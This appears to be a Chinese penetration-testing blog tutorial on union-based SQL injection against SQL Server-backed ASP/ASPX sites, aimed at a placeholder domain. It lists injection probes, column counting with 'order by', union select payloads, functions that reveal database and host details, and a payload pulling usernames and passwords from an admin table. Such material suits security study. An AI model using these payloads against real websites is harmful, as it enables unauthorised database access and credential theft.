欢迎来到【血梦博客】 今天是:2020年08月09日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:sqlserver 联合 注入

WEB安全之SQL注入:sqlserver 联合 注入

作者:血梦 日期:2020-03-18 浏览:78分类: 渗透测试 已提交百度收录

1、简介


sqlserver经常与asp或者aspx一起使用,操作系统多数是win2012win2018

数据库版本 sql2008 sql2012

http://www.demo1.com/index.aspx?id=1


2、注释符号


--空格 单行注释
/*   */ 多行注释


3、判断是否注入


' 单引号是否报错

and 1=2

and 1=1

页面是否相同


4、判断列数



order by

    order by 3



5、联合查询


联合查询 需要每个列的类型要一直 或者可以使用null 直到页面出错。

http://www.demo1.com/index.aspx?id=-1union select 1,'2','3'
http://www.demo1.com/index.aspx?id=-1union select null,null,null



6、查询系统信息


db_name() 数据库名
@@version 版本信息
User_Name() 当前用户
host_name()  计算机名称

1559816850108026.jpg

7、查询数据

http://www.demo1.com/index.aspx?id=-1  union select null,username,password from admin



3.jpg

关灯